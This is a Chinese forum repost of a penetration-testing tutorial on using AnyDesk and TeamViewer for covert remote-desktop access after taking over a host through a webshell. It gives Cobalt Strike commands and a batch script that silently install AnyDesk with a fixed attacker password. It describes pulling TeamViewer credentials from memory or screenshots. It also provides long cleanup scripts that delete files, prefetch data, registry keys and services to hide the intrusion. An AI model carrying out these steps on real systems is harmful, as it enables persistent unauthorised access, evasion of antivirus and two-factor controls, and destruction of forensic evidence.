AnyDesk和TeamViewer在渗透测试中的应用

Delina · 发表于 2021-7-2 13:56:05

原文链接：AnyDesk和TeamViewer在渗透测试中的应用

0x01 前言
假设已经通过某漏洞拿到目标主机的Webshell权限，这时可以先看下里边是否安装的有以下这些第三方软件，它们可以不用通过Mstsc.exe即可进行远程桌面连接。

向日葵；
ToDesk；
AnyDesk；
TeamViewer；
Radmin；
RealVNC；
PcAnywhere；
[...SNIP...]

复制代码

利用向日葵/ToDesk/AnyDesk/TeamViewer等第三方软件进入远程桌面时需要使用Administrators权限来执行，而Radmin/RealVNC/PcAnywhere只需找到连接密码即可。
相关阅读：
向日葵软件在渗透测试中的应用（直接点击即可访问）
https://www.yuque.com/docs/share ... 8dab-28848fe91640?#（密码：hist）
0x02 应用场景
AnyDesk与TeamViewer等这类软件都具备内网穿透、文件传输、流量加密等功能，而且它们有数字签名，所以大部分杀毒软件都不会对其进行查杀，在远程桌面连接中可应用场景包括但不限于以下几点。

1) Windows RDP远程桌面连接登录限制；
2) 某狗、盾、锁、神等计算机名和IP认证；
3) Duo Security RDP等双因素身份验证；
[...SNIP...]

复制代码

0x03 AnyDesk利用方式
首先在本地执行AnyDesk并设置下“为自主访问设置密码”，AnyDesk目录下会生成一些配置文件用来存储我们的ID、Pass、Key和证书等数据，这里记好我们的ID和设置好的Pass，用于后期连接目标机器上的AD，执行过程中不会有UAC弹窗。

接着把AnyDesk上传至目标磁盘，创建%userprofile%\AppData\Roaming\AnyDesk目录，然后将我们本地的service.conf配置文件上传进去以后再执行AD即可，这个文件是用来给AD设置一个固定的连接ID和Pass。

beacon> shell md %userprofile%\AppData\Roaming\AnyDesk
beacon> shell C:\ProgramData\AnyDesk.exe

复制代码

注：本地用AnyDesk连接目标时必须先删除%userprofile%\AppData\Roaming\AnyDesk目录下的所有文件，然后重新执行AD，因为只有这样AD才会重新分配一个新的ID给我们，必须与原ID不一样才可以连接目标机器，否则可能会连接到我们本地机器。

或者我们可以在命令行直接执行以下批处理文件进行静默安装并设置固定连接密码，接着通过--get-id参数获取AD的连接ID，如果在获取不到连接ID时可以尝试在choice中增加延迟。

@echo off
AnyDesk.exe --install "C:\ProgramData\AnyDesk" --silent
echo licence_keyABC | "C:\ProgramData\AnyDesk\AnyDesk.exe" --register-licence
echo anydesk!@# | "C:\ProgramData\AnyDesk\AnyDesk.exe" --set-password
choice /t 10 /d y /n >nul
for /f "delims=" %%i in ('anydesk --get-id') do set CID=%%i
echo Connection ID Is: %CID%

复制代码

可能需要清理的痕迹：

@echo off
taskkill /f /im AnyDesk.exe
del /s /q %userprofile%\AppData\Roaming\AnyDesk\*.*
rmdir /s /q %userprofile%\AppData\Roaming\AnyDesk
rmdir /s /q "%userprofile%\AppData\Roaming\Apple Computer"
rmdir /s /q %userprofile%\Videos\AnyDesk
rmdir /s /q %userprofile%\Pictures\AnyDesk
del /s /q %userprofile%\Recent\AnyDesk.lnk
del /s /q %userprofile%\AppData\Roaming\Microsoft\Windows\Recent\AnyDesk*.lnk
del /s /q C:\Windows\Prefetch\ANYDESK*.pf
taskkill /f /im AnyDesk.exe
rmdir /s /q C:\ProgramData\AnyDesk
reg delete "HKCR\AnyDesk" /f
reg delete "HKCR\.anydesk" /f
reg delete "HKLM\SOFTWARE\Classes\AnyDesk" /f
reg delete "HKLM\SOFTWARE\Clients\Media\AnyDesk" /f
reg delete "HKLM\SYSTEM\ControlSet001\Services\AnyDesk" /f
reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AnyDesk" /f
sc delete AnyDesk
del /s /q AnyDesk.exe
[...SNIP...]

复制代码

0x04 TeamViewer利用方式通过以下命令查看目标机器TV绝对路径，也可以自己上传一个免安装版TV并执行，然后再用TeamViewer利用工具获取它的连接ID和Pass。
在执行过程中可能会出现UAC弹窗，这里不管我们选择是或者否都会运行，但这种方式在实战中动静还是太大了。

tasklist /svc | findstr "TeamViewer" & sc qc TeamViewer
wmic process where name="TeamViewer.exe" get processid,name,executablepath
TeamViewer ID：1 118 357 536 - TeamViewer Pass：7224
图片

复制代码

大部分利用工具原理都是在TeamViewer.exe进程的窗体句柄或内存中找到的ID和Pass。

或者我们可以在执行TV后通过使用Meterpreter和CobaltStrike中的screenshot命令截取目标机器桌面得到TeamViewer的连接ID和Pass。

可能需要清理的痕迹：

@echo off
taskkill /f /im TeamViewer.exe /im tv_w32.exe /im tv_x64.exe
rd /s /q C:\Windows\Temp\TeamViewerPortable
rd /s /q "%ProgramFiles%\TeamViewer"
rd /s /q "%ProgramFiles(x86)%\TeamViewer"
rd /s /q %userprofile%\AppData\Roaming\TeamViewer
rd /s /q %userprofile%\AppData\Local\TeamViewer
rd /s /q %userprofile%\AppData\Local\Temp\TeamViewer
rd /s /q %userprofile%\AppData\Local\Temp\1\TeamViewer
rd /s /q %userprofile%\AppData\Local\Temp\1\TeamViewerPortable
del /s /q %userprofile%\AppData\Roaming\Microsoft\Windows\Recent\TeamViewer*.lnk
del /s /q C:\Windows\Fonts\teamviewer*.otf
del /s /q C:\Windows\Prefetch\TeamViewer*.pf
del /s /q C:\ProgramData\Intel\ShaderCache\TeamViewer*
sc delete TeamViewer
[...SNIP...]

复制代码

		自动登录	找回密码
密码			立即注册